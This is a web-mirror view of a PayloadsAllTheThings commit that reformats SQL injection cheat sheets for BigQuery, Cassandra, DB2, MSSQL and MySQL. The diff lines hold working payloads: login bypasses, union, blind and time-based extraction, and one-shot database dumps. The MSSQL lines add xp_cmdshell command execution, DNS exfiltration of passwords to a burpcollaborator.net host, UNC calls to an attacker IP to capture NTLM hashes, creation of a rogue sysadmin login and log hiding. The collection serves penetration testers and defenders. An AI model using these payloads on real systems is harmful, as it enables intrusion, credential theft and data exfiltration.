Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 00:44:04 +01:00
Code Issues Projects Releases Wiki Activity

Markdown Linting - SQL, Juggling, XSLT, XSS, Zip

Browse source
This commit is contained in:
Swissky 2025-03-26 20:53:03 +01:00
parent bad860d79d
commit 2611dd1ba3
24 changed files with 445 additions and 646 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

7
SQL Injection/BigQuery Injection.md
View file

@ -12,7 +12,6 @@
* [BigQuery Time Based](#bigquery-time-based)
* [References](#references)
## Detection
* Use a classic single quote to trigger an error: `'`
@ -24,7 +23,6 @@
| `SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA` | Gathering all dataset names |
| `select * from project_id.dataset_name.table_name` | Gathering data from specific project id & dataset |
## BigQuery Comment
| Type | Description |
@ -32,7 +30,6 @@
| `#` | Hash comment |
| `/* PostgreSQL Comment */` | C-style comment |
## BigQuery Union Based
```ps1
@ -49,7 +46,6 @@ true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,
| `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` | Division by zero |
| `select CAST(@@project_id AS INT64)` | Casting |
## BigQuery Boolean Based
```ps1
@ -60,10 +56,9 @@ true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,
* Time based functions does not exist in the BigQuery syntax.
## References
* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
* [BigQuery Documentation - Query Syntax - October 30, 2024](https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax)
* [BigQuery Documentation - Functions and Operators - October 30, 2024](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - Duc Nguyen - March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)
* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - Duc Nguyen - March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)

19
SQL Injection/Cassandra Injection.md
View file

@ -2,7 +2,6 @@
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.
## Summary
* [CQL Injection Limitations](#cql-injection-limitations)
@ -10,21 +9,19 @@
* [Cassandra Login Bypass](#cassandra-login-bypass)
* [Example #1](#example-1)
* [Example #2](#example-2)
* [References](#references)
* [References](#references)
## CQL Injection Limitations
* Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging.
* Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging.
* Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata.
* Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata.
* Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected.
* Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected.
* Time-based SQL injections, which typically rely on functions like `SLEEP()` to introduce a delay, are also difficult to execute in CQL since it doesnt include a `SLEEP()` function.
* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
## Cassandra Comment
@ -32,7 +29,6 @@
/* Cassandra Comment */
```
## Cassandra Login Bypass
### Example #1
@ -55,8 +51,7 @@ The injection would look like the following SQL query
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```
## References
- [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
- [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/)
* [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
* [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/)

25
SQL Injection/DB2 Injection.md
View file

@ -1,7 +1,6 @@
# DB2 Injection
> IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments.
> IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments.
## Summary
@ -15,16 +14,14 @@
* [DB2 Command Execution](#db2-command-execution)
* [DB2 WAF Bypass](#db2-waf-bypass)
* [DB2 Accounts and Privileges](#db2-accounts-and-privileges)
* [References](#references)
* [References](#references)
## DB2 Comments
## DB2 Comments
| Type | Description |
| -------------------------- | --------------------------------- |
| `--` | SQL comment |
## DB2 Default Databases
| Name | Description |
@ -36,7 +33,6 @@
| SYSIBMADM | Administrative views for monitoring and managing the database system. |
| SYSTOOLs | Tools, utilities, and auxiliary objects provided for database administration and troubleshooting. |
## DB2 Enumeration
| Description | SQL Query |
@ -52,7 +48,6 @@
| Current database | `select current server from sysibm.sysdummy1` |
| OS info | `select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info` |
## DB2 Methodology
| Description | SQL Query |
@ -64,7 +59,6 @@
| List tables | `SELECT name FROM sysibm.systables` |
| List tables | `SELECT tbname FROM sysibm.syscolumns WHERE name='username'` |
## DB2 Error Based
```sql
@ -79,7 +73,6 @@ select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sys
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables
```
## DB2 Blind Based
| Description | SQL Query |
@ -94,10 +87,9 @@ select xml2clob(xmelement(name t, table_schema)) from sysibm.tables
| Bitwise XOR | `select bitxor(1,0) from sysibm.sysdummy1` |
| Bitwise NOT | `select bitnot(1,0) from sysibm.sysdummy1` |
## DB2 Time Based
Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
```sql
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
@ -113,7 +105,6 @@ Using the `QSYS2.QCMDEXC()` on IBM i (previously named AS-400), it is possibile
'||QCMDEXC('QSH CMD(''system dspusrprf PROFILE'')')
```
## DB2 WAF Bypass
### Avoiding Quotes
@ -122,7 +113,6 @@ Using the `QSYS2.QCMDEXC()` on IBM i (previously named AS-400), it is possibile
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1
```
## DB2 Accounts and Privileges
| Description | SQL Query |
@ -137,9 +127,8 @@ SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1
| List DBA accounts | `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'` |
| Location of DB files | `select * from sysibmadm.reg_variables where reg_var_name='DB2PATH'` |
## References
- [DB2 SQL injection cheat sheet - Adrián - May 20, 2012](https://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/)
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet - @pentestmonkey - September 17, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
- [QSYS2.QCMDEXC() - IBM Support - April 22, 2023](https://www.ibm.com/support/pages/qsys2qcmdexc)
* [DB2 SQL injection cheat sheet - Adrián - May 20, 2012](https://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/)
* [Pentestmonkey's DB2 SQL Injection Cheat Sheet - @pentestmonkey - September 17, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
* [QSYS2.QCMDEXC() - IBM Support - April 22, 2023](https://www.ibm.com/support/pages/qsys2qcmdexc)

69
SQL Injection/MSSQL Injection.md
View file

@ -1,7 +1,6 @@
# MSSQL Injection
> MSSQL Injection is a type of security vulnerability that can occur when an attacker can insert or "inject" malicious SQL code into a query executed by a Microsoft SQL Server (MSSQL) database. This typically happens when user inputs are directly included in SQL queries without proper sanitization or parameterization. SQL Injection can lead to serious consequences such as unauthorized data access, data manipulation, and even gaining control over the database server.
> MSSQL Injection is a type of security vulnerability that can occur when an attacker can insert or "inject" malicious SQL code into a query executed by a Microsoft SQL Server (MSSQL) database. This typically happens when user inputs are directly included in SQL queries without proper sanitization or parameterization. SQL Injection can lead to serious consequences such as unauthorized data access, data manipulation, and even gaining control over the database server.
## Summary
@ -34,18 +33,16 @@
* [MSSQL OPSEC](#mssql-opsec)
* [References](#references)
## MSSQL Default Databases
| Name | Description |
|-----------------------|---------------------------------------|
| pubs | Not available on MSSQL 2005 |
| model | Available in all versions |
| msdb | Available in all versions |
| tempdb | Available in all versions |
| northwind | Available in all versions |
| information_schema | Available from MSSQL 2000 and higher |
| pubs | Not available on MSSQL 2005 |
| model | Available in all versions |
| msdb | Available in all versions |
| tempdb | Available in all versions |
| northwind | Available in all versions |
| information_schema | Available from MSSQL 2000 and higher |
## MSSQL Comments
@ -55,7 +52,6 @@
| `--` | SQL comment |
| `;%00` | Null byte |
## MSSQL Enumeration
| Description | SQL Query |
@ -74,7 +70,6 @@
| User | `SELECT system_user;` |
| User | `SELECT user;` |
### MSSQL List Databases
```sql
@ -107,7 +102,6 @@ SELECT table_name FROM information_schema.tables WHERE table_catalog='<DBNAME>'
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
```
### MSSQL List Columns
```sql
@ -122,7 +116,6 @@ SELECT table_catalog, column_name FROM information_schema.columns
SELECT COL_NAME(OBJECT_ID('<DBNAME>.<TABLE_NAME>'), <INDEX>)
```
## MSSQL Union Based
* Extract databases names
@ -154,10 +147,9 @@ SELECT COL_NAME(OBJECT_ID('<DBNAME>.<TABLE_NAME>'), <INDEX>)
* Finally extract the data
```sql
$ SELECT UserId, UserName from Users
SELECT UserId, UserName from Users
```
## MSSQL Error Based
| Name | Payload |
@ -181,7 +173,6 @@ SELECT COL_NAME(OBJECT_ID('<DBNAME>.<TABLE_NAME>'), <INDEX>)
' + cast((SELECT @@version) as int) + '
```
## MSSQL Blind Based
```sql
@ -194,7 +185,6 @@ WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_ta
SELECT message FROM data WHERE row = 1 and message like 't%'
```
### MSSQL Blind With Substring Equivalent
| Function | Example |
@ -210,7 +200,6 @@ AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
```
## MSSQL Time Based
In a time-based blind SQL injection attack, an attacker injects a payload that uses `WAITFOR DELAY` to make the database pause for a certain period. The attacker then observes the response time to infer whether the injected payload executed successfully or not.
@ -228,10 +217,10 @@ IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
```
## MSSQL Stacked Query
* Stacked query without any statement terminator
```sql
-- multiple SELECT statements
SELECT 'A'SELECT 'B'SELECT 'C'
@ -245,18 +234,17 @@ IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
```
* Use a semi-colon "`;`" to add another query
```sql
ProductID=1; DROP members--
```
## MSSQL File Manipulation
### MSSQL Read File
**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission.
```sql
OPENROWSET(BULK 'C:\path\to\file', SINGLE_CLOB)
```
@ -267,14 +255,12 @@ Example:
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
```
### MSSQL Write File
```sql
execute spWriteStringToFile 'contents', 'C:\path\to\', 'file'
```
## MSSQL Command Execution
### XP_CMDSHELL
@ -294,7 +280,7 @@ EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```
### Python Script
### Python Script
> Executed by a different user than the one using `xp_cmdshell` to execute commands
@ -304,27 +290,25 @@ EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__im
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
```
## MSSQL Out of Band
### MSSQL DNS exfiltration
Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1
Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578/photo/1)
* **Permission**: Requires VIEW SERVER STATE permission on the server.
* **Permission**: Requires `VIEW SERVER STATE` permission on the server.
```powershell
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))
```
* **Permission**: Requires the CONTROL SERVER permission.
* **Permission**: Requires the `CONTROL SERVER` permission.
```powershell
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))
```
### MSSQL UNC Path
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
@ -347,7 +331,6 @@ RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
```
## MSSQL Trusted Links
> The links between databases work even across forest trusts.
@ -379,7 +362,6 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
## MSSQL Privileges
### MSSQL List Permissions
@ -409,29 +391,29 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
SELECT is_srvrolemember('sysadmin');
```
### MSSQL Make User DBA
```sql
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```
## MSSQL Database Credentials
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
```sql
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
-- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
```
* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
```sql
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```
## MSSQL OPSEC
Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password`
@ -441,14 +423,13 @@ Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_passwor
-- The text has been replaced with this comment for security reasons.
```
## References
- [AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice - Marc Olivier Bergeron - June 21, 2023](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
- [Error based SQL Injection in "Order By" clause - Manish Kishan Tanwar - March 26, 2018](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
- [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - January 28, 2009](https://www.exploit-db.com/papers/12975)
- [IS_SRVROLEMEMBER (Transact-SQL) - Microsoft - April 9, 2024](https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15)
- [MSSQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
- [MSSQL Trusted Links - HackTricks - September 15, 2024](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
- [SQL Server - Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
- [sys.fn_my_permissions (Transact-SQL) - Microsoft - January 25, 2024](https://docs.microsoft.com/en-us/sql/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15)
* [AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice - Marc Olivier Bergeron - June 21, 2023](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
* [Error based SQL Injection in "Order By" clause - Manish Kishan Tanwar - March 26, 2018](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - January 28, 2009](https://www.exploit-db.com/papers/12975)
* [IS_SRVROLEMEMBER (Transact-SQL) - Microsoft - April 9, 2024](https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15)
* [MSSQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* [MSSQL Trusted Links - HackTricks - September 15, 2024](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
* [SQL Server - Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
* [sys.fn_my_permissions (Transact-SQL) - Microsoft - January 25, 2024](https://docs.microsoft.com/en-us/sql/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15)

150
SQL Injection/MySQL Injection.md
View file

@ -2,7 +2,6 @@
> MySQL Injection is a type of security vulnerability that occurs when an attacker is able to manipulate the SQL queries made to a MySQL database by injecting malicious input. This vulnerability is often the result of improperly handling user input, allowing attackers to execute arbitrary SQL code that can compromise the database's integrity and security.
## Summary
* [MYSQL Default Databases](#mysql-default-databases)
@ -33,9 +32,9 @@
* [MYSQL Current Queries](#mysql-current-queries)
* [MYSQL Read Content of a File](#mysql-read-content-of-a-file)
* [MYSQL Command Execution](#mysql-command-execution)
* [WEBSHELL - OUTFILE method](#shell---outfile-method)
* [WEBSHELL - DUMPFILE method](#shell---dumpfile-method)
* [COMMAND - UDF Library](#udf-library)
* [WEBSHELL - OUTFILE method](#webshell---outfile-method)
* [WEBSHELL - DUMPFILE method](#webshell---dumpfile-method)
* [COMMAND - UDF Library](#command---udf-library)
* [MYSQL INSERT](#mysql-insert)
* [MYSQL Truncation](#mysql-truncation)
* [MYSQL Out of Band](#mysql-out-of-band)
@ -50,14 +49,12 @@
* [Wide Byte Injection (GBK)](#wide-byte-injection-gbk)
* [References](#references)
## MYSQL Default Databases
| Name | Description |
|--------------------|--------------------------|
| mysql | Requires root privileges |
| information_schema | Available from version 5 and higher |
## MYSQL Comments
@ -73,32 +70,34 @@ MySQL comments are annotations in SQL code that are ignored by the MySQL server
| `;%00` | Nullbyte |
| \` | Backtick |
## MYSQL Testing Injection
* **Strings**: Query like `SELECT * FROM Table WHERE id = 'FUZZ';`
```
' False
'' True
" False
"" True
\ False
\\ True
```ps1
' False
'' True
" False
"" True
\ False
\\ True
```
* **Numeric**: Query like `SELECT * FROM Table WHERE id = FUZZ;`
```ps1
AND 1 True
AND 0 False
AND true True
AND false False
1-false Returns 1 if vulnerable
1-true Returns 0 if vulnerable
1*56 Returns 56 if vulnerable
1*56 Returns 1 if not vulnerable
AND 1 True
AND 0 False
AND true True
AND false False
1-false Returns 1 if vulnerable
1-true Returns 0 if vulnerable
1*56 Returns 56 if vulnerable
1*56 Returns 1 if not vulnerable
```
* **Login**: Query like `SELECT * FROM Users WHERE username = 'FUZZ1' AND password = 'FUZZ2';`
```ps1
' OR '1
' OR 1 -- -
@ -109,14 +108,12 @@ MySQL comments are annotations in SQL code that are ignored by the MySQL server
'=0--+
```
## MYSQL Union Based
### Detect Columns Number
To successfully perform a union-based SQL injection, an attacker needs to know the number of columns in the original query.
#### Iterative NULL Method
Systematically increase the number of columns in the `UNION SELECT` statement until the payload executes without errors or produces a visible change. Each iteration checks the compatibility of the column count.
@ -127,7 +124,6 @@ UNION SELECT NULL, NULL;--
UNION SELECT NULL, NULL, NULL;--
```
#### ORDER BY Method
Keep incrementing the number until you get a `False` response. Even though `GROUP BY` and `ORDER BY` have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
@ -148,20 +144,18 @@ Similar to the previous method, we can check the number of columns with one requ
ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+ # Unknown column '4' in 'order clause'
```
#### LIMIT INTO Method
This method is effective when error reporting is enabled. It can help determine the number of columns in cases where the injection point occurs after a LIMIT clause.
This method is effective when error reporting is enabled. It can help determine the number of columns in cases where the injection point occurs after a LIMIT clause.
| Payload | Error |
| ---------------------------- | --------------- |
| `1' LIMIT 1,1 INTO @--+` | `The used SELECT statements have a different number of columns` |
| `1' LIMIT 1,1 INTO @,@--+ ` | `The used SELECT statements have a different number of columns` |
| `1' LIMIT 1,1 INTO @,@--+` | `The used SELECT statements have a different number of columns` |
| `1' LIMIT 1,1 INTO @,@,@--+` | `No error means query uses 3 columns` |
Since the result doesn't show any error it means the query uses 3 columns: `-1' UNION SELECT 1,2,3--+`.
### Extract Database With Information_Schema
This query retrieves the names of all schemas (databases) on the server.
@ -188,7 +182,6 @@ This query aims to retrieve data from a specific table.
UNION SELECT 1,2,3,4,...,GROUP_CONCAT(0x7c,data,0x7C) FROM ...
```
### Extract Columns Name Without Information_Schema
Method for `MySQL >= 4.1`.
@ -206,8 +199,7 @@ Method for `MySQL 5`
| `UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a` | Duplicate column name '**name**' |
| `UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a` | Data |
### Extract Data Without Columns Name
### Extract Data Without Columns Name
Extracting data from the 4th column without knowing its name.
@ -226,7 +218,6 @@ MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SE
+-----------+-----------------------------------------------------------------+
```
## MYSQL Error Based
| Name | Payload |
@ -240,7 +231,6 @@ MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SE
| NAME_CONST | `AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--` |
| UUID_TO_BIN | `AND UUID_TO_BIN(version())='1` |
### MYSQL Error Based - Basic
Works with `MySQL >= 4.1`
@ -250,7 +240,6 @@ Works with `MySQL >= 4.1`
'+(SELECT 1 AND ROW(1,1)>(SELECT COUNT(*),CONCAT(CONCAT(@@VERSION),0X3A,FLOOR(RAND()*2))X FROM (SELECT 1 UNION SELECT 2)A GROUP BY X LIMIT 1))+'
```
### MYSQL Error Based - UpdateXML Function
```sql
@ -268,7 +257,6 @@ UPDATEXML(null,CONCAT(0x0a,version()),null)-- -
UPDATEXML(null,CONCAT(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- -
```
### MYSQL Error Based - Extractvalue Function
Works with `MySQL >= 5.1`
@ -281,7 +269,6 @@ Works with `MySQL >= 5.1`
?id=1 AND EXTRACTVALUE(RAND(),CONCAT(0X3A,(SELECT CONCAT(CHAR(126),data_column,CHAR(126)) FROM data_schema.data_table LIMIT data_offset,1)))--
```
### MYSQL Error Based - NAME_CONST function (only for constants)
Works with `MySQL >= 5.0`
@ -292,7 +279,6 @@ Works with `MySQL >= 5.0`
?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)--
```
## MYSQL Blind
### MYSQL Blind With Substring Equivalent
@ -313,7 +299,6 @@ Examples of Blind SQL injection using `SUBSTRING` or another equivalent function
?id=1 AND ASCII(LOWER(SUBSTR(version(),1,1)))=51
```
### MYSQL Blind Using a Conditional Statement
* TRUE: `if @@version starts with a 5`:
@ -332,7 +317,6 @@ Examples of Blind SQL injection using `SUBSTRING` or another equivalent function
HTTP/1.1 200 OK
```
### MYSQL Blind With MAKE_SET
```sql
@ -342,7 +326,6 @@ AND MAKE_SET(VALUE_TO_EXTRACT<(SELECT(length(concat(login,password)))),1)
AND MAKE_SET(VALUE_TO_EXTRACT<ascii(substring(concat(login,password),POS,1)),1)
```
### MYSQL Blind With LIKE
In MySQL, the `LIKE` operator can be used to perform pattern matching in queries. The operator allows the use of wildcard characters to match unknown or partial string values. This is especially useful in a blind SQL injection context when an attacker does not know the length or specific content of the data stored in the database.
@ -357,7 +340,6 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
SELECT * FROM products WHERE product_name LIKE '%user_input%'
```
### MySQL Blind with REGEXP
Blind SQL injection can also be performed using the MySQL `REGEXP` operator, which is used for matching a string against a regular expression. This technique is particularly useful when attackers want to perform more complex pattern matching than what the `LIKE` operator can offer.
@ -368,12 +350,12 @@ Blind SQL injection can also be performed using the MySQL `REGEXP` operator, whi
| `' OR (SELECT username FROM users WHERE username REGEXP '[0-9]') --` | Checking for the presence of digits |
| `' OR (SELECT username FROM users WHERE username REGEXP '^a[a-z]') --` | Checking for data starting by "a" |
## MYSQL Time Based
The following SQL codes will delay the output from MySQL.
* MySQL 4/5 : [`BENCHMARK()`](https://dev.mysql.com/doc/refman/8.4/en/select-benchmarking.html)
```sql
+BENCHMARK(40000000,SHA1(1337))+
'+BENCHMARK(3200,SHA1(1))+'
@ -381,6 +363,7 @@ The following SQL codes will delay the output from MySQL.
```
* MySQL 5: [`SLEEP()`](https://dev.mysql.com/doc/refman/8.4/en/miscellaneous-functions.html#function_sleep)
```sql
RLIKE SLEEP([SLEEPTIME])
OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
@ -428,7 +411,6 @@ Extracting column_name.
1 AND (SELECT SLEEP(10) FROM DUAL WHERE (SELECT table_name FROM information_schema.columns WHERE table_schema=DATABASE() AND column_name LIKE '%pass%' LIMIT 0,1) LIKE '%')#
```
### Using Conditional Statements
```sql
@ -437,7 +419,6 @@ Extracting column_name.
?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
```
## MYSQL DIOS - Dump in One Shot
DIOS (Dump In One Shot) SQL Injection is an advanced technique that allows an attacker to extract entire database contents in a single, well-crafted SQL injection payload. This method leverages the ability to concatenate multiple pieces of data into a single result set, which is then returned in one response from the database.
@ -448,41 +429,46 @@ DIOS (Dump In One Shot) SQL Injection is an advanced technique that allows an at
```
* SecurityIdiots
```sql
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
```
* Profexer
```sql
(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
```
* Dr.Z3r0
```sql
(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))
```
* M@dBl00d
```sql
(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
```
* Zen
```sql
+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
```
* sharik
```sql
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)
```
## MYSQL Current Queries
`INFORMATION_SCHEMA.PROCESSLIST` is a special table available in MySQL and MariaDB that provides information about active processes and threads within the database server. This table can list all operations that DB is performing at the moment.
The `PROCESSLIST` table contains several important columns, each providing details about the current processes. Common columns include:
The `PROCESSLIST` table contains several important columns, each providing details about the current processes. Common columns include:
* **ID** : The process identifier.
* **USER** : The MySQL user who is running the process.
@ -492,17 +478,16 @@ The `PROCESSLIST` table contains several important columns, each providing detai
* **TIME** : The time in seconds that the process has been running.
* **STATE** : The current state of the process.
